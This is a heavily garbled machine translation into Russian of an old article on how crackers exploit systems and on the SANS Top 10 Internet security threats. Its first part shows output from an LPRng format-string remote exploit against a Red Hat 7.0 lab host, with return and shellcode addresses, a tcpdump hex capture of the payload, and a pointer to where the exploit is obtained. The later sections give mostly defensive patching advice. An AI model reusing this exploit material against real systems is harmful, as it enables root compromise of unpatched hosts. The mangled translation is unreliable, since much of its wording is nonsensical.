SANS Top 10 и эксплуатация ведении крекеры

В этой статье мы будем охватывать подвиги ведении крекеры. Мы также рассчитываем на SANS 10 Большинство критических Internet Security Угрозы список.

Эксплуатирует

Прогнозные имеет жизненно важное значение для разбираться, что открыто, и тем, что закрыт. Следующим шагом на крекинг является фактически перерыв в компьютерной сети. Крекеры это сделать, используя слабые места в операционных системах обслуживания.

Есть многие подвиги там; Установление правильного использования может быть головная боль. Не все подвиги созданы равными. Под этим я подразумеваю, что большинство использует являются операционной системы зависит. Просто потому что есть строки принтера использовать в Linux не означает, что она будет работать на Solaris, и наоборот.

Чтобы объяснить, какой использовать это выглядит, когда она осуществляется, я включил в эту статью вывода из эксплуатации и некоторые пакеты, участвующих в эксплуатации. Во-первых, мало справочную информацию по эксплуатации я решил бежать. В конце 2000, прощупывания деятельности увеличился на порт 515 (строка порт принтера). Это было отношение к эксплуатации в Red Hat 7,0 строке принтера демон. На момент написания этого, я еще увидеть много проб на эту услугу в моем брандмауэр.

Если Вы хотите использовать я использовал, можно найти на http://www.netcat.it.

Вот списки обещал вместе с некоторыми играть по играть для каждого:

  + + + www.netcat.it удаленный эксплойт для LPRng / lpd 

  + + + Эксплойт информации 

  + + + Жертва: 192.168.1.25 

  + + + Вид: 0 - RedHat 7,0 - Guinesss 

  + + + Eip адрес: 0xbffff3ec 

  + + + Shellcode адрес: 0xbffff7f2 

  + + + Должность: 300 

  + + + Выравнивание: 2 

  + + + Сдвиг 0 

  + + + нападение на 192.168.1.25 с нашими форматирования строки 

  + + + Бруте сил мужчина, расслабиться и наслаждаться езды; > 

Из этого вывода, мы знаем, что эксплуатировать это нападение на Red Hat 7,0 строке принтера (тип 0 - RedHat7.0 - Guinesess). Хотите посмотреть, как tcpdump считает, что это нападение?

  18:34:19.991789> 192.168.1.5.2894> 192.168.1.25.printer: S 4221747912:4221747912 (0) выиграть 

  32120 <mss 1460,sackOK,timestamp 4058996 0,nop,wscale 0> (DF) (ttl 64, номер 11263) 

  4500 003c 2bff 4000 4006 8b4e c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c8 0000 0000 

  a002 7d78 8bb1 0000 0204 05b4 0402 080a 

  003 г ef74 0000 0000 0103 0300 

  18:34:19.993434 <192.168.1.25.printer> 192.168.1.5.2894: S 397480959:397480959 (0) ack 

  4221747913 выиграть 32120 <mss 1460,sackOK,timestamp 393475 4058996,nop,wscale 0> (DF) (ttl 64, 

  номер 3278) 

  4500 003c 0cce 4000 4006 aa7f c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 13ff fba2 c2c9 

  a012 7d78 5ee7 0000 0204 05b4 0402 080a 

  0006 0103 003d ef74 0103 0300 

  18:34:19.993514> 192.168.1.5.2894> 192.168.1.25.printer:.  1:1 (0) ack 1 выиграть 32120 <nop, 

  nop, времени 4058996 393475> (DF) (ttl 64, номер 11264) 

  4500 0034 2c00 4000 4006 8b55 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 1400 

  8010 7d78 8dac 0000 0101 080a 003d ef74 

  0006 0103 

  18:34:19.999662 <192.168.1.25.printer> 192.168.1.5.2894: P 1:31 (30) ack 1 выиграть 32120 

  <nop, nop, времени 393476 4058996> (DF) (ttl 64, номер 3279) 

  4500 0052 0ccf 4000 4006 aa68 c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 1400 fba2 c2c9 

  8018 7d78 3e5b 0000 0101 080a 0006 0104 

  003 г ef74 6c70 643a 203a 204d 616c 666f 

  726 г 6564 2066 726f 6d20 6164 6472 6573 

  730 один 

  18:34:19.999686> 192.168.1.5.2894> 192.168.1.25.printer:.  1:1 (0) ack 31 выиграть 32120 <nop, 

  nop, времени 4058997 393476> (DF) (ttl 64, номер 11265) 

  4500 0034 2c01 4000 4006 8b54 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141e 

  8010 7d78 8d8c 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.000863 <192.168.1.25.printer> 192.168.1.5.2894: F 31:31 (0) ack 1 выиграть 32120 

  <nop, nop, времени 393476 4058997> (DF) (ttl 64, номер 3280) 

  4500 0034 0cd0 4000 4006 aa85 c0a8 0119 

  c0a8 0105 0203 0b4e 17b1 141e fba2 c2c9 

  8011 7d78 8d8b 0000 0101 080a 0006 0104 

  003 г ef75 

  18:34:20.000878> 192.168.1.5.2894> 192.168.1.25.printer:.  1:1 (0) ack 32 выиграть 32120 <nop, 

  nop, времени 4058997 393476> (DF) (ttl 64, номер 11266) 

  4500 0034 2c02 4000 4006 8b53 c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f 

  8010 7d78 8d8b 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.049095> 192.168.1.5.2894> 192.168.1.25.printer: P 1:424 (423) ack 32 выиграть 32120 

  <nop, nop, времени 4059002 393476> (DF) (ttl 64, номер 11267) 

  4500 01db 2c03 4000 4006 89ab c0a8 0105 

  c0a8 0119 0b4e 0203 fba2 c2c9 17b1 141f 

  8018 7d78 54c5 0000 0101 080a 003d ef7a 

  0006 0104 4242 f0ff ffbf f1ff ffbf f2ff 

  ffbf f3ff ffbf 5858 5858 5858 5858 5858 

  5858 5858 5858 5858 252e 3137 3675 2533 

  3030 246e 252e 3133 7525 3330 3124 6e25 

  2 e32 3533 7525 3330 3224 6e25 2e31 3932 

Давайте остановимся на том, что происходит здесь. Во-первых, мы видим, 192.168.1.5 и 192.168.1.25 пытается сделать соединение TCP, используя типичные три способом рукопожатия. В следующей последовательности событий, мы видим 192.168.1.5 попытке запуска использовать против 192.168.1.25. Наконец, мы видим 192.168.1.5 толкаю 423 байт данных 192.168.1.25. На продолжает использовать это время, пока он в состоянии лобовым в эксплуатацию.

При этом использовать работал, 192.168.1.25 меня с корпуса (не в том, что мне нужна она), и я мог делать все, что я когда-либо хотел.

Эксплуатирует являются способом крекеры ворваться систем. Чтобы защитить себя от них, вам придется обновить операционную систему с заплатками. (Это касается всех систем.)

В без верхней 10

В SANS Top 10 Большинство критических Internet Security Угрозы приведен список наиболее распространенных подвиги найти на компьютерных сетей. Что делает этот список столь ценным является тот факт, что группа Системное администрирование Безопасность сети приведен список соответствующих CVE записей (Общие уязвимости и воздействия), так что человек может сделать больше исследований, если это необходимо. Этот список был составлен SANS с помощью многих экспертов по вопросам безопасности и безопасности сообщества.

В CVE данных можно найти на http://www.cve.mitre.org/.

Подробнее о SANS Top 10 см http://www.sans.org/topten.htm.

Первый использовать перечисленные на Top 10 является BIND. BIND - это программа используется для DNS серверов (чтобы помочь решить имен в адреса) и используется во всем Интернете. В последние несколько лет основные дыры были обнаружены во многих версий BIND. Крайне важно для тех, кто проходит BIND всегда отставать от последних уязвимостей. По Jan. 29, 2001, Сеть ассошиэйтс инкорпорейтед "объявила, что она обнаружила более уязвимости, связанные с BIND версии 4 и BIND версии 8. Patches были освобождены и могут быть загружены с Вашей операционной системой продавцов в Интернете.

Если Вы хотели бы прочитать документ, освобождены ЧГП, вы можете получить его здесь: http://www.pgp.com/aboutus/press/pr_template.asp?PR=/PressMedia/01282001-A.asp&Sel = 900 или можно прочитать CERT консультативных на http://www.cert.org/advisories/CA-2001-02.html.

Вторая использовать в SANS Top 10 является Уязвимые CGI программы. Они были вокруг в течение многих лет и являются основной причиной большинства из взломать сайты, которые получают основные сведения.

Многие из этих CGI - БИН программ покинуть примеры программ после установки, которые являются уязвимыми и позволяет злонамеренному пользователю получить "корневой" доступ. Когда злоумышленник получает, что уровень доступа, он может сделать как ему заблагорассудится (изменить сайте). Я предоставил некоторые ссылки для получения дополнительной информации по CGI - БИН нападения. Этот перечень не является всеобъемлющим; См. копать немного дальше, если вы считаете, что уязвимы.

Дополнительную информацию можно найти по CGI - БИН нападений с http://www.cert.org/advisories/CA-1997-24.html, http://www.cert.org/advisories/CA-1996-11.html , или http://www.cert.org/advisories/CA-1997-07.html.

Третий использовать уязвим дистанционного процедуры призывает (RPCs). RPCs позволить C программ чтобы процедура требует на других машинах в сети. Большинство продавцов предоставить патчи помогут ужесточить вниз служб RPC. Тем не менее, наиболее эффективной политикой в отношении этой службы, если в ней не нуждается, а затем убить его. Можно запустить пс - ef | grep rpc, найдите идентификатор процесса (PID), а затем запустите убить -9 PID. Кроме того, можно отключить RPC услуг на начало на большинстве операционных систем UNIX, изменив при запуске файла (в / и т.д. / rc.d /) из S (начала) к K (убийство). Вы можете узнать, что RPC программ запускается с помощью rpcinfo -p.

Дополнительную информацию можно найти на RPC атаки из http://www.cert.org/incident_notes/IN-99-04.html.

Четвертая использовать на SANS Top 10 список уязвимых данных дистанционного службы безопасности дыры в IIS. (Если честно, я удивлен Microsoft не больше уязвимости в Top 10.) Я могу суммировать решения этой эксплуатировать действительно быстро… Patch вашего IIS.

Дополнительную информацию можно найти по RDS безопасности отверстия от http://www.wiretrip.net/rfp/p/doc.asp?id=29&iface=2.

Пятая использовать уязвим sendmail и MIME нападения. Эти уязвимости, связанные с переполнение буфера, а также трубы нападения, которые позволяют немедленно корневой компромисса. Есть несколько способов обеспечить этих проблем. Первая заключается в поддержании правильного патчи для вашего sendmail / почтовых серверов. Если вам не нужно запускать любой из этих услуг, их можно отключить (в соответствии с теми же процедурами, изложенными в RPC).

Дополнительную информацию можно найти по sendmail безопасности отверстия от http://www.cert.org/advisories/CA-97.05.sendmail.html.

Шестая использовать уязвим sadmind и mountd. Эта уязвимость распространяется на Linux машин, а также Solaris машины.

Дополнительную информацию о sadmind и mountd безопасности лунок, поездки http://www.cert.org/advisories/CA-99-16-sadmind.html или http://www.cert.org/advisories/CA-1998.12 . mountd.html.

Седьмая использовать в Top 10 является глобальной совместного использования файлов, используя NetBIOS портов 135-139). Это, вероятно, крупнейшим проблема безопасности пользователей, если они подключены к кабельному модему или DSL. Большинство не понимает концепцию совместного использования файлов, и оставить возможность совместного использования файлов. Другая проблема заключается в Napster. Хотя Napster нет в списке, это люди требуют поделиться каталогов и, что может привести к обмену более, чем это необходимо. Как исправить это? Эти предложения из SANS http://www.sans.org/topten.htm сайта:

A. Когда обмен смонтированы диски, обеспечения требуется только каталоги являются общими.

В. Для дополнительной безопасности, чтобы обмен только на конкретные адреса, поскольку DNS имена могут быть был фальсифицирован.

С. Для Windows систем, обеспечить все акции были защищены с сильным пароли.

D. Для Windows NT систем, предотвращения анонимного перечисления пользователей, групп, конфигурация системы и ключей реестра через "недействительным сессии" связи.

Заблокировать входящие соединения с NetBIOS сессия обслуживания (tcp 139) на маршрутизаторе или NT хоста. Рассмотрение осуществления RestrictAnonymous реестра ключ к Интернет, подключенных хостов в автономном или не доверять доменных средах.

Восьмая использовать слабо пароли. Должен ли я сказать больше? При любой форме оценка рисков, одним из наиболее распространенных уязвимости, я вижу, слаб пароли. Если сформулировать пароль, не забудьте следовать этим простым принципов:

- Убедитесь, что пароль в восемь символов.

- Убедитесь, что пароль представляет собой комбинацию цифр, специальных символов, и алфавитно-цифровые символы.

- Выбрать пароль, который отсутствует в словаре.

Дополнительную информацию о сильных пароль, посетите http://www.cert.org/tech_tips/passwd_file_protection.html.

Девятая использовать это IMAP и СОЗ буфера, уязвимости или неправильной конфигурации. Опять же, лучший способ обеспечить себя от этих нападений, чтобы отключить службу, если вы в ней не нуждается. Кроме того, применяются последние патчи (если необходимо запустить сервис).

Дополнительную информацию по IMAP и СОЗ безопасности посетите http://www.cert.org/advisories/CA-1998.09.imapd.html, http://www.cert.org/advisories/CA-1998.08. qpopper_vul.html или http://www.cert.org/advisories/CA-1997.09.imap_pop.html.

Окончательный использовать в SANS Top 10 является по умолчанию строки сообщества SNMP установлена на "публичной" и "частной". Наряду со слабыми паролями, эта уязвимость может контролироваться основными администрации.

Дополнительную информацию о SNMP и сообщества строки см. http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm # xtocid210315.

Помните, что это не единственная уязвимость в Интернете. А крекинг можете использовать любой эксплуатировать его в его мешок приемы против вас и вашей сети.